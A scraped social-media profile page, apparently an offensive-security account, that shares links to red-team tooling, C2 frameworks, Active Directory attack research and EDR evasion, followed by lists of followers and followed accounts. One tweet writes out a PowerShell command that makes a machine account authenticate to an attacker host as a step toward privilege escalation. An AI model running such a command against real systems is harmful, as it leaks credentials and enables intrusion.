-
Tweets507
-
Followers2K
-
Following627
-
Likes2K
hashcat v7.0.0 released! After nearly 3 years of development and over 900,000 lines of code changed, this is easily the largest release we have ever had. Detailed writeup is available here: hashcat.net/forum/thread-1…
Red teamers know the drill: endless file churning, hunting for passwords & tokens. 🔍 Meet DeepPass2, our new secret scanning tool that goes beyond structured tokens to catch those tricky free-form passwords too. Read Neeraj Gupta's blog post for more. ghst.ly/40HLNNA
This new @SpecterOps paper fills me with so much joy
And here's the direct link to Ramoreik and s_lck's work: github.com/TheSleekBoyCom…
It's been almost a year since my last blog... So, here is a new one: Extending AD CS attack surface to the cloud with Intune certificates. Also includes ESC1 over Intune (in some cases). dirkjanm.io/extending-ad-c… Oh, and a new tool for SCEP: github.com/dirkjanm/scepr…
This is so much! 🔥🔥😎 Found two new Potato triggers just today. Not only Potato but can also be used for LPE as remote auth is done which could be relayed to LDAP without Signing enabled. Or relayed to ADCS for a certificate. github.com/warpnet/MS-RPC…
Introducing Havoc Professional: A Lethal Presence We’re excited to share a first look at Havoc Professional, a next-generation, highly modular Command and Control framework, and Kaine-kit our fully Position Independent Code agent engineered for stealth! infinitycurve.org/blog/introduct…
New article for those curious about what they can find in the AD Recycle Bin (Bonus: I updated bloodyAD so you can play on this😉) linkedin.com/feed/update/ur…
FileFix - A ClickFix Alternative mrd0x.com/filefix-clickf…
Introducing the BloodHound Query Library! 📚 @martinsohndk & @joeydreijer explore the new collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem. ghst.ly/4jTgRQQ
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵
The FastCGI library, mostly used in embedded equipment, was vulnerable for decades to an integer overflow over the IPC socket in 32-bits architecture. Check out how @ShiroPycatchown found it and exploited it for RCE! synacktiv.com/en/publication…
🚀 RF Swift v0.6.0 is here! 🛡️ Now with host & network isolation, it's become THE essential tool for security work. No more host reinstallation, VM or burner laptop headaches! #RFSwift 📡✨ 👉 Release: github.com/PentHertz/RF-S…
I Backdoored Cursor AI 😎 youtu.be/FYok3diZY78 Finally getting a chance to play with Loki C2, the super cool Node JS C2 framework for backdooring Electron applications (think Discord, Slack, too!) -- put together by the incredible @0xBoku 🔥We even got to nerd out over DMs to…
New day, new #BloodHoundBasics post! DYK that BloodHound CE now supports deep linking? This week, we released early access support that goes beyond what the old back button offered! Go back (& forward), & share your current view of the graph w/ your fellow operators today! 1/2
As promised... this is Loki Command & Control! 🧙♂️🔮🪄 Thanks to @d_tranman for his work done on the project and everyone else on the team for making this release happen! github.com/boku7/Loki
Reforging Sliver: How Simple Code Edits Can Outmaneuver EDR fortbridge.co.uk/research/refor…
We've been cooking 🧑🍳 Exegol images 3.1.6 are live 🔷 Container startup time is 50% faster (improved my-resources performance and logging) 🚀 🔷 Images are 10% lighter (removed buildtime cache, git shallow) 🪶 🔷 New tools, released Exegol history v2 module (beta 🪲), extended…
For those interested in the browser cache smuggling attack I presented yesterday, you will find the full blogpost here sensepost.com/blog/2023/brow…. I'll update it ASAP so that it includes the entire weaponizing part as well as some clever remediations I discussed with some of you :)
Happy #BloodHoundBasics day! Tired of the old 'Enable SMB signing everywhere' rec that isn't actually practical? BloodHound can help you convert that massive IT project into a doable risk mitigation effort, focused on those systems truly vulnerable to relay attacks. 🧵: 1/2

Charlie Bromberg « ... @_nwodtuhs
15K Followers 653 Following Trying to hack the way we hack things 🏴☠️
sn🥶vvcr💥sh @snovvcrash
12K Followers 488 Following Sr. Penetration Tester / Red Team Operator @ptswarm :: Author of the Pentester’s Promiscuous Notebook :: He/him :: Tweets’re my pwn 🐣
Justin Elze @HackingLZ
65K Followers 5K Following CTO @TrustedSec | Former Optiv/SecureWorks/Accuvant Labs/Redspin | Race cars
Mayfly @M4yFly
7K Followers 782 Following Former Dev and DevOps| Pentester and red teamer at orange cyberdefense | OSCE³| Tweet are my own| discord: m4yfly
Vincent Yiu @vysecurity
29K Followers 308 Following Director, Red Team, Offensive Security. Help organizations safeguard their businesses from the bad guys.
n00py @n00py1
13K Followers 963 Following Retweeter of InfoSec/Offsec/Pentest/Red Team. Occasional blogger/Independent security research.
Rémi GASCOU (Podalir... @podalirius_
8K Followers 651 Following Security Researcher & Speaker | Microsoft Security MVP | Developer of security tools 🎬 https://t.co/QaAENc4NcY
John Hammond @_JohnHammond
298K Followers 3K Following Cybersecurity Researcher @HuntressLabs || Just Hacking Training @JustHackingHQ w/ @ethicalhacker || https://t.co/UtsNJiyQtS || https://t.co/narO3sz7y6
Swissky @pentest_swissky
20K Followers 2K Following RedTeam | Pentest Author of PayloadsAllTheThings & SSRFmap https://t.co/w1ZLRqoafG
d1rkmtr @d1rkmtr
8K Followers 463 Following
klez @KlezVirus
8K Followers 705 Following Independent Cyber Security Researcher - Opinions are my own
Dave Kennedy @HackingDave
223K Followers 6K Following Founder @Binary_Defense @TrustedSec Co-Owner https://t.co/HQC75WhdJh. @WeHackHealth Pod. God + Family/Hacker/CSO/USMC/Intel/Fitness. Make the world a better place.
BlackWasp @BlWasp_
2K Followers 249 Following Pentester and Red Team technical leader at Advens | Microsoft MVP
Sali One @SaliOne938694
5 Followers 69 Following
Trevor C @renonce4
16 Followers 160 Following Goose farmer IRL. All retweets are full endorsements of everything they said and any future statements.
Zerox1 @zerox7877
7 Followers 530 Following
ΞVΞΠΓ HФЯƗZФ�... @61u3int31
17 Followers 235 Following Ghost in the machine, system glitch searching for electric sheep. @[email protected]
Ironhawk461 @ironhawk4633034
2 Followers 95 Following
techn00bguy @techn00bguy
251 Followers 3K Following Forever n00b | Cloud, InfoSec, OSINT, and Privacy enthusiast | Keep Learning!
Roberto_Sanz 🇨🇱... @Sanz_robe
327 Followers 5K Following
KarnaZee @KarnaZeeGhost
3 Followers 43 Following
__________ @unterschein
1 Followers 101 Following
iuzeoriuzermsdlkj @azeazeqsdqsdff
0 Followers 44 Following
пельмень по... @zerotrustbox
50 Followers 252 Following Cybersec-dev C\C++ Windows Kernel Developer(WDM/WDF/KMDF)
vivescere @vivescere
6 Followers 162 Following
Balkrishna Jadhav @hacker3j
823 Followers 8K Following AVP - Threat Hunting @ Kotak Mahindra Bank| Senior Threat Intelligence|Forensicator|MindHunter| Innovator|Malwarologist|Espionage||Inventor
arip petits @AripPetits
6 Followers 1K Following
l @elloullou
0 Followers 41 Following
Pierre @pierrecdg
49 Followers 1K Following
ک ђ ץ Ʀ 0 @Shyr0x77
19 Followers 482 Following
Vertigosint @vertigosint
2K Followers 2K Following OSINT & Threat Intel | 🇫🇷 | Threat Intelligence analyst | https://t.co/KYpywnpoMX
Maverick🇵🇸 @mavric1337
208 Followers 2K Following Our sweetest songs are those that tell of saddest thoughts
Meruem @Meruem49839142
169 Followers 8K Following
Chris Isaias @_call_gate
108 Followers 2K Following Penetration Testing & Reverse Engineering. . . Phd(c), Msc (RHL), ESDC fellow, IEEE snr, FIRST liaison, CISSP, CRTO, PNPT, CRTP
0x8048c20 @7DfcYiFaI2V32I1
0 Followers 1K Following
Meta @MetaMeowMeow
117 Followers 4K Following
CyberAI_Hunter @nizarhammadi81
343 Followers 3K Following ⚡ Hacking systems. Exposing truths. Building tools. Fighting silence in the digital warzone. #Infosec #AI #CyberOps
llgoon @llgoon1
38 Followers 3K Following
lived @chngjzh
33 Followers 1K Following
Ramyar Mhamad @ramyar_adam
6 Followers 204 Following
Soughsh @Soughshol05Pn
15 Followers 535 Following
ivachy @ivachy129182
0 Followers 8 Following
term @1149q
14 Followers 685 Following
flagshipgarbage @velvetvibes2
60 Followers 1K Following 🇯🇵 / Pentester / Red Teamer / Offensive Security Hobbyist / Love to make fun stuff even if it's not worth / Simplicity matters, and it always conquers.
Inflearner @inflearner
1 Followers 66 Following
IT GRC Forum @ITGRC
24K Followers 23K Following Educational Programs on IT, Governance, Risk Management, & Compliance (GRC)
IT CPE Academy @itcpecredit
290 Followers 4K Following Self-Study CPE Programs to help professionals acquire the skills, knowledge and certificates in IT and cybersecurity
vx-underground @vxunderground
368K Followers 290 Following The largest collection of malware source code, samples, and papers on the internet. Password: infected
Charlie Bromberg « ... @_nwodtuhs
15K Followers 653 Following Trying to hack the way we hack things 🏴☠️
Oliver Lyak @ly4k_
9K Followers 265 Following Yet another security researcher 🔦 Github: https://t.co/7WFOFz17KI
sn🥶vvcr💥sh @snovvcrash
12K Followers 488 Following Sr. Penetration Tester / Red Team Operator @ptswarm :: Author of the Pentester’s Promiscuous Notebook :: He/him :: Tweets’re my pwn 🐣
Florian Hansemann @CyberWarship
84K Followers 47 Following Father, Founder @HanseSecure, Pentesting, Student, ExploitDev, Redteaming, InfoSec & CyberCyber; -- Mastodon: https://t.co/KFSKYUN98M
mpgn @mpgn_x64
18K Followers 230 Following Flibustier du net ̿ ̿̿'̿'\̵͇̿̿\=(•̪●)=/̵͇̿̿/'̿̿ ̿ ̿ ̿ Podcast Hack'n Speak @hacknspeak / https://t.co/GyACSFg9mw
Adam Chester 🏴�... @_xpn_
36K Followers 501 Following Hacker for Hire at @SpecterOps | Blog at https://t.co/tjfTOllCEu | Insta at https://t.co/PqR6CZPwjl
Justin Elze @HackingLZ
65K Followers 5K Following CTO @TrustedSec | Former Optiv/SecureWorks/Accuvant Labs/Redspin | Race cars
Florian Roth ⚡️ @cyb3rops
206K Followers 3K Following Head of Research @nextronsystems #DFIR #YARA #Sigma | detection engineer | creator of @thor_scanner, Aurora, Sigma, LOKI, YARA-Forge | always busy ⌚️🐇 | vi/vim
Nicolas Krassas @Dinosn
146K Followers 735 Following Head of Threat & Vulnerability Mgmt @ Henkel AG & Co. KGaA https://t.co/NC1orlKrW3
chompie @chompie1337
83K Followers 1K Following hacker, weird machine mechanic, X-Force Offensive Research (XOR)
Mayfly @M4yFly
7K Followers 782 Following Former Dev and DevOps| Pentester and red teamer at orange cyberdefense | OSCE³| Tweet are my own| discord: m4yfly
mgeeky | Mariusz Bana... @mariuszbit
14K Followers 812 Following 🔴 Operator, Initial Access afficionado, Researcher, ex-AV engine developer, ex-Malware analyst 🦋 @mgeeky.bsky.social 🫖 green tea lover
Mike Felch (Stay Read... @ustayready
16K Followers 2K Following Targeted Ops Red Team @ TrustedSec | Hacking since Renegade BBS backdoors | Prior CrowdStrike/BHIS | In Christ's grip | I speak for myself only | K1HAQ
Grzegorz Tworek @0gtweet
36K Followers 2K Following My own research, unless stated otherwise. Not necessarily "safe when taken as directed". GIT d- s+: a+ C++++ !U !L !M w++++$ b++++ G-
Vincent Yiu @vysecurity
29K Followers 308 Following Director, Red Team, Offensive Security. Help organizations safeguard their businesses from the bad guys.
Christopher @Kharosx0
3K Followers 2K Following Founder @signal_labs : https://t.co/8grJlb5jwZ 🇦🇺 Vulnerability researcher (MORSE) @Microsoft Discord: Kharosx0
Zeecka 🥀 @Zeecka_
2K Followers 447 Following Security Researcher - #OSCP #OSWE - Former @ENSIBS, CTF Player, @AperiKube member, Author of https://t.co/CUJwAEifKm
Quentin Texier 🦀 @g0h4n_0
479 Followers 325 Following 🇫🇷 Pentester and Red Team Operator | OSCP | CRTO @randorisec @safetechred https://t.co/93IVhoU5BR
Thomas Roccia 🤘 @fr0gger_
31K Followers 2K Following AI Security x Threat Intel · Sr. Threat Researcher @Microsoft · Creator of #Unprotect & #NOVA · Malware Warlock · Python 🧡 · Prev @McAfee_Labs · Views mine 😈
Gael MUSQUET ⠵ @RatZillaS
11K Followers 4K Following Westindian who loves Debian,HamRadio @F4HXS #N6HXS Astronomy. Father, knight h4ck3r GPG:0x76E279EE [email protected] https://t.co/WUgOMhcFzN
Wil @wil_fri3d
487 Followers 121 Following
Vertigosint @vertigosint
2K Followers 2K Following OSINT & Threat Intel | 🇫🇷 | Threat Intelligence analyst | https://t.co/KYpywnpoMX
ProjectDiscovery @pdiscoveryio
37K Followers 125 Following Detect real, exploitable vulnerabilities. Harness the power of Nuclei for fast and accurate findings without false positives.
jswzl @WeaselJs
1K Followers 1 Following jswzl helps make web application testing easier with static analysis, making it easier to audit JS code and do your recon/mapping
Kondah Hamza 🦑 @kondah_ha
3K Followers 864 Following 👾Architecte Cybersécurité | Fondateur Hexadream | Ⓜ️icrosoft MVP |
laxa @l4x4
695 Followers 261 Following
spencer @techspence
12K Followers 2K Following 🛡️Empowering defenders & dismantling threats | Ethical Threat | pentester @securit360 | host @cyberthreatpov | SWAG https://t.co/AFJtZQcti7
voydstack @voydstack
2K Followers 929 Following 🥷 @Synacktiv | CTF with @RMUBYGG, @Hexagonctf, @ECSC_TeamFrance 20/21/22/23/24
Hugow @hugow_vincent
913 Followers 975 Following Red Team and research @synacktiv @rustyphasm.bsky.social
Smukx.E @5mukx
14K Followers 230 Following Malware Researcher & Red Teamer | 0-Day 🔬 at 🌒 | Crafts codes in Rust | 0x15 Y/o
SinSinology @SinSinology
13K Followers 674 Following Pwn2Own 20{22,23,24,24.5,25,25.5}, i look for 0-Days but i find N-Days & i chase oranges 🍊
MDSec @MDSecLabs
15K Followers 0 Following Consultancy and Training from a trusted supplier of offensive security. Red Team and Adversary Simulation by ActiveBreach team | https://t.co/fqpbJ9WDXD | https://t.co/UvOhGA4Zou
Caido @CaidoIO
9K Followers 33 Following
Gray Hats @the_yellow_fall
9K Followers 379 Following Welcome to the Daily Cybersecurity site, your trusted source for cybersecurity news and insights since 2017!
Noobosaurus R3x 🦖 @NoobosaurusR3x
2K Followers 648 Following L3 H4ck3r L3 Plu5 n00b Du w3b https://t.co/9Ey8TAzkLT https://t.co/jCTWg1DAPe
MSec Operations @MSecOps
1K Followers 1 Following
bearstech @bearstech
16K Followers 3K Following #SCOP d'experts du #LogicielLibre Confiez nous la performance de vos applications (hébergement, infogérance, #devops, #SRE, sécurité, efficacité énergétique)
BallisKit @BallisKit
3K Followers 33 Following BallisKit provides tooling and services to professional Pentesters & Red Teams. We develop MacroPack, ShellcodePack, and DarwinOps. #redteam #infosec
Het Mehta @hetmehtaa
36K Followers 1K Following Security Analyst | Content Creator | I Spread Cybersecurity News & Talk about AI, Cloud, Tech, Tools & Recent Updates
Justin Bollinger @Bandrel
6K Followers 2K Following hacker, finder of EKUwu (CVE-2024-49019) https://t.co/XQuqk8nGG6
Traceix @usetraceix
17K Followers 416 Following Correlate binaries by behavior | Demo: https://t.co/elkZk1VrrC | Discord: https://t.co/jcZBvfLOic | Product of Revix Labs LLC
Mr. OS @ksg93rd
2K Followers 974 Following To catch an adversary you must become one. Always deliver more than expected !!!!!! All post are educational purposes only. prompt Library ⬇️ URL
Simone Margaritelli @evilsocket
47K Followers 2K Following Music, cybersecurity, open source and AI • Author of bettercap, pwnagotchi, opensnitch, bleah, legba and a few other things.
Charles Fol @cfreal_
4K Followers 667 Following previously @ambionics @LexfoSecurite – blogs: https://t.co/cLoNdCGPU7 https://t.co/JVMLjUzTJU https://t.co/t9a5IcOXSU
CVETrends @CVEShield
2K Followers 114 Following
C2 Matrix | #C2Matrix @c2_matrix
6K Followers 97 Following Matrix of Command and Control (C2) Frameworks #C2Matrix #RedTeam #BlueTeam #PurpleTeam
Charlie @ghost_motley
11K Followers 735 Following I post about PC hardware, technology, games, films, TV shows, politics and world events.
Dominic Chell 👻 @domchell
18K Followers 540 Following Just your friendly neighbourhood red teamer @MDSecLabs | Creator of /r/redteamsec | https://t.co/3k3EBAZqGd | https://t.co/KwO2OwDOkl
Lsec @lsecqt
4K Followers 162 Following Doing ethical hacking / red teaming / penetration testing and offensive coding videos. I am OSCP / OSEP / Vulnerability Researcher / Youtuber
Darkoperator | 🇺�... @Carlos_Perez
44K Followers 185 Following Information Security Professional, Open Source Tool Dev, Microsoft MVP, and all-around techie. Opinions are my own.
No Starch Press @nostarch
36K Followers 3K Following The finest in geek entertainment. Email us: [email protected] We're live M-F, 7am-6pm PDT
RedTeamTacticsAcademy @RedTeamTactics
5K Followers 435 Following Outsmart, Outmaneuver, Redefine the Tactics blog 👉 https://t.co/jBrypEoM7c learn 👉 https://t.co/llylzGEs0D
Yarden Shafir @yarden_shafir
24K Followers 309 Following A circus artist with a visual studio license
Tim Misiak @timmisiak
8K Followers 280 Following OS/systems engineer. Worked on WinDbg for a while. I write about low level tech sometimes. On bluesky: @timdbg.com On mastodon/fediverse: @[email protected]
hasherezade @hasherezade
89K Followers 910 Following Programmer, #malware analyst. Author of #PEbear, #PEsieve, #TinyTracer. Private account. All opinions expressed here are mine only (not of my employer etc)